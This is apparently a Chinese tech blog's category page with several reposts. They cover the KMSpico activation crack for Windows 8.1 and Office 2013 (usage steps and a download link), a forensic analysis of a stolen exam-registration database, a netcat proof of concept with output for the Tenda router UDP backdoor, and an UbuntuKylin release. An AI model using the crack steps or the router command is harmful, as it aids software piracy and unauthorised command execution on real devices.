分类 技术类 下的文章

Windows 8.1 简单一键完美激活破解工具 KMSpico 已出现下载 (含Office 2013激活破解方法)

在微软正式发布了新系统几天之后,很多同学都在纷纷寻找简单好用的 Windows 8.1 激活方法,可惜大多破解方式均较为麻烦。不过近日网上终于出现了一个简单好用的 Win 8.1 一键完美激活工具了。

这个 Win 8.1 完美激活工具就是 KMSpico,最新版本除了可激活 Win 8.1 之外,还能轻松激活 Office 2013!它使用的方式是 KMS 激活(Key Management Service密钥管理服务),这是微软目前产品使用的一种激活机制,它借助伪造的 KMS 服务器来绕过 Windows 正版验证从而实现方便快捷的一键破解激活……

KMSpico

KMSpico - 目前最简单激活 Windows 8.1 和 Office 2013 的破解工具和激活方法:

据了解,由于 KMSpico 的激活原理是通过模拟一个 KMS 服务器来给 Windows 或 Office 进行激活授权,如果180天后激活过期了,那么只需再用该方法重新激活一次即可。如果你目前安装的是零售版的 Win 8.1 或 Office 2013,那么 KMSpico 会将它们转换成 VL 批量授权版本。换句话说,不管你是零售版、企业版还是VL版的 Windows 8.1 和 Office 2013,KMSpico 都可以帮你一键完美激活。

KMSPico 完美激活工具截图KMSPico 激活工具的界面很简单(简陋)

经验证测试,用户只右键点击 KMSpico 选择以管理员身份运行来安装它,点击 Tokens Backup 可以备份当前激活信息(用于日后恢复),然后点击红色的按钮即可完成激活的步骤,操作非常非常的简单。而且除了支持激活 Win 8.1 和 Office 2013 之外,KMSpico 还可以激活包括 Win7、Server 2008、Office 2010 等更多版本的软件 (Win7需安装 .NetFramework 4.0) :

Windows Vista Business/N/Enterprise/N
Windows 7 Professional/N/Enterprise/N
Windows 8 全部版本
Windows Server 2008/Standard/Datacenter/Enterprise
Windows Server 2008R2/Standard/Datacenter/Enterprise
Windows 2012/Standard/Datacenter
Office 2010 / Office 2013

写在后面:

话说 KMS 激活机制自从 Windows Vista 发布以来就被微软所用,但黑客们总有方法通过伪造 KMS 服务器来绕过验证,多年来这个方法也成为 Windows 和 Office 的经典激活破解方法之一,很多激活软件、破解补丁等都是利用此方法进行无限期使用,KMSpico 也不例外。

虽然目前 Windows 8.1 和 Office 2013 已被成功破解,但我们还是鼓励大家使用正版软件,毕竟正版才是最安全稳定的!谁知道黑客有没在破解工具里面做过什么手脚呢,而且这类软件一般都会被杀毒软件拦截的,利弊就大家自己衡量吧。

下载地址:点击下载

[法客二周年]看我如何取证抓出黑阔!

大家都在写日站过程,我就放出一篇抓日站的过程,哈。 

开个玩笑,实例取证过程,大家都懂的,所以严格打码,见谅~~

2099年13月33日某市某局考试报名服务器遭受了两次攻击,都是被直接下载了数据库。
下载数据库的行为是通过后台合法下载,因此,在之前的证据调查中被忽略了。

取证分析:起初,我们通过安装在考试网服务器上抓包工具抓到的数据包,导入科莱数据分析软件,转化成明文显示从而进行下一步分析,如图所示
图1
(科莱Colasoft Capsa 7 版本:7.3.1 Build 2436)
<ignore_js_op>QQ截图20131022191309.png
再以Excel格式导出,以IP排序,搜索大量连续访问的IP,搜索排出敏感url,查询是否有木马后门,或者上传操作页面等。如图2
图2
“图片漏点-已屏蔽”
<ignore_js_op>2.png
所有抓包日志分析下来,无任何可疑后门url,发现大量自动化扫描工具的扫描痕迹,均无入侵成功痕迹。

我们尝试寻找网站程序漏洞,没有注入漏洞,发现一处问题,用户可查询其他用户资料,但前提需要知道ID生成规则,如:
http://x.x.x.x/08104/ks_left.act ... f04013bac0f9b1c01d6
于是我们分析查询所有数据包日志,发现如下几个IP的ID查询登录次数与时间很可疑,
<ignore_js_op>3.png
<ignore_js_op>4.png
<ignore_js_op>5.png
221.136.152.195和 202.105.247.6这两个IP是浙江宁波联通的IP,一直有操作,以上是登录查询记录。
经分析只有两种可能:
1.他利用tables.id轮循出其他考生信息
2.不知道他怎么获得其他考生的登录密码,他反复登录
一个IP 多次登录本身就有异常,怀疑是XX考试一条龙服务公司,但一般做这行的公司基本都是本地,
宁波可能性不大,我们和人事局沟通分析他们怀疑是代考团队。
这算我们意外发现的一个漏洞,经过调查,这些线索无法定性,不确定算不算攻击。

我们怀疑入侵者很可能合法通过后台直接登录直接拿走数据,或者有服务器权限,通过和某某局机房负责人协商
,我们登录服务器进行网站程序排查,未发现任何后门木马,并从网站程序了解到数据库使用access数据库,
数据库文件名为*.mdb,下载页面downloadGJ.action
我们通过关键词mdb以及download进行url排查,发现下载痕迹。
数据包为:
<ignore_js_op>6.png
两次记录分别是:

2013/1/29 8:50        2013/1/29 8:50        218.76.159.133        HTTP        GET http://x.x.x.x/06109/downloadGJ.action(湖南省郴州市 电信)

2013/1/29 8:35        2013/1/29 8:35        61.181.22.157        HTTP        GET http://x.x.x.x/06109/downloadGJ.action(天津市 联通ADSL)
2013/01/28 08:44:59   61.152.108.187    HTTP      POST http://x.x.x.x/06109/exportdataGJ.action

我们使用数据分析软件打开2013/1/29/8:35 2013/1/29/8:44的数据包
找到downloadGj.action,如图6所示
图6:
<ignore_js_op>7.png
定位到此IP,点数据包选项,搜索定位到downloadGj.action,如图7所示
图7:
<ignore_js_op>8.png
8中
分析:在图8中,发现了此IP直接进行了TCP三次握手,然后径直访问了数据库后台下载页面,执行了下载操作。如图8所示
图8
<ignore_js_op>10.png
在图9中,是本次连接的二进制解码信息。可看到是执行了数据库下载。
<ignore_js_op>11.png
图10
在图三中,是后续的下载二进制数据的解码信息,可看到就是某某局考试报名数据库的表结构,后面分了几十个包下载,共计19M。
<ignore_js_op>12.png
图10

(注:IP地址是通过互联网查到的物理位置,未必准确,希望公安进一步核实)

经过进一步调查,发现218.76.159.133和61.181.22.157都是HTTP代理服务器。

为了穿透代理追求真实IP,我方对数据包的包头进行了二进制解码,定位到downloadGJ.action,证据图11
<ignore_js_op>13.png
从上图得知HTTP包头中追到了代理源IP地址,即来自于218.76.159.133攻击行为的源IP为221.223.70.137。
<ignore_js_op>1~.png
图11
灰色部分未记录了代理源IP的HTTP包头数据,翻译过来就是:X-Forwarded-For:
221.223.70.137

证据图12中二进制编码解析得到显示数据库的字段
<ignore_js_op>2~.png
如下证据图,通过二进制解码,可看到下载内容,
<ignore_js_op>3~.png
<ignore_js_op>4~.png
我们又用相同的方法解析了来自61.152.108.187的数据包,根据解析的数据,这次也执行了下载,真实IP也是221.223.70.137

这个真实IP每天早晨8点40左右开始下载数据。

经过三次下载行为判断,应该是同一人所为:

我们在二进制包里解析出了访问者的计算机配置:
CPU:AMD64
浏览器:IE9
操作系统:Windows 7 x64

进入途径:
我们查询http://x.x.x.x/06109/exportdataGJ.action定位到该数据包,证据图12
图12
<ignore_js_op>!!!.png
黑客直接使用admin的密码登陆,如图13
<ignore_js_op>@!.png
图13

分析建议:
建议联系当地某部门锁定这个IP,如果是家里的ADSL,可直接定位,如果是公司的IP,则可联系公司调取上网行为管理日志。
如没有日志,可通过上面给出的机器配置信息到内部找到配置类似的机器,有可能这个人有自己的笔记本电脑。

找到电脑,注意看还有没有IE访问记录,历史记录是可以保存的,如果对方删除了,历史记录还可以通过Windows隐藏位置调出。

密码泄露途径分析:
1.要么某某局自己人泄露给别人
2.要么黑客自己注入爆出密码
3.要么开发的人设置了一个隐蔽的模块,专门用来偷密码
第一种可能性我这里保留意见,个人认为不可能;
第二种可能性我认为概率不高,我们测试过,并且反编译过程中也观察过,没发现明显的注入问题,这个代码是在一个开源的中间件平台上改的(我们怀疑,看源码的时候感觉有些像,但是不敢完全肯定,他们改动很多),那么如果这上面出问题,也难说;
第三种可能性:如果设置了这个机关,那应该就是在中间件底层设置的,应用层我们都反编译了,没发现这个问题。中间件底层的话,我们如果强行进行反编译,工作量非常大,暂时放弃反编译的工作。

差不多了,以上是一次真实的取证过程,放出来给法客的基友look下,希望大家不要转载到外面!,谢谢~

 

 

本文转自法客

 

Tenda路由器后门,From China,With Love!

同一个网站爆的,只需发送一个udp包,围观地址:

http://www.devttys0.com/2013/10/from-china-with-love/

poc
$ echo -ne "w302r_mfgx00x/bin/ls" | nc -u -q 5 192.168.0.1 7329 drwxr-xr-x 2 0 0 1363 webroot drwxr-xr-x 1 0 0 0 var drwxr-xr-x 5 0 0 43 usr drwxr-xr-x 1 0 0 0 tmp drwxr-xr-x 2 0 0 3 sys drwxr-xr-x 2 0 0 569 sbin dr-xr-xr-x 39 0 0 0 proc drwxr-xr-x 2 0 0 3 mnt drwxr-xr-x 1 0 0 0 media drwxr-xr-x 4 0 0 821 lib lrwxrwxrwx 1 0 0 11 init -> bin/busybox drwxr-xr-x 2 0 0 3 home drwxr-xr-x 7 0 0 154 etc_ro drwxr-xr-x 1 0 0 0 etc drwxr-xr-x 1 0 0 0 dev drwxr-xr-x 2 1000 100 574 bin
博客里面提到的路由器Tenda’s W302R , Tenda W330R, Medialink MWN-WAPR150N.

中国版 UbuntuKylin 13.10 麒麟中文版操作系统发布下载 (Ubuntu天朝定制版)

知名的 Linux 操作系统发行版 Ubuntu 于今天发布了中国定制版的操作系统 —— UbuntuKylin (麒麟)。这是Canonical公司与我国工信部软件与集成电路促进中心、国防科技大学组建的CCN开源创新联合实验室开发的。

UbuntuKylin 在 Ubuntu 原版的基础上进行了大量的本地化工作 (如内置天气、农历日历、音乐搜索等) 而来的衍生版,也是 Ubuntu 社区官方认可的操作系统,CCN是完全按照开源的模式来打造的这款产品。日后 Ubuntu 麒麟将会加入更多的中国特色功能,如中文输入法、地图、集成WPS、网银支付等应用……

UbuntuKylin 操作系统简介:

UbuntuKylin 麒麟 是基于原版的 Ubuntu 桌面版而来,是官方认可的衍生版本,所以在 Ubuntu 新版本中所增加的新特性麒麟同样会拥有。

UbuntuKylin 麒麟操作系统

根据官方的消息称,UbuntuKylin 将会在更多的地方做出专为国人使用的定制功能,譬如中文输入法、集成WPS 办公套件、网银支付等。此外,UbuntuKylin 也将可能会与戴尔、惠普等公司合作推出内置该系统的产品。未来还将会将其拓展到其他的平台,包括云端、服务器,平板和智能手机等。

UbuntuKylin 麒麟操作系统

由于 UbuntuKylin 被打上了“国家”的标签,很多人表示这项目有X经费之嫌等等,这点不在本站的讨论范围,但不管怎样,凡事都有多面性,麒麟的出现肯定也会对国内 Linux (Ubuntu) 的普及带来积极的作用的。希望日后这个CCN联盟真能做出更多适合国人使用的特色功能吧,如果你现在已经对其有兴趣,那么也可以下载回去试试看。

UbuntuKylin 麒麟操作系统

UbuntuKylin 麒麟操作系统

UbuntuKylin 麒麟操作系统

PS:首次试用的同学可以先用 VMWare、VirtualBox 等虚拟机软件进行测试,减少安装多系统或重装系统带来的麻烦。当然,如果你打算长期使用的话,还是建议原生安装,这样才会有更高性能和更流畅的使用体验。

相关文件下载地址:

官方网站:访问
软件性质:免费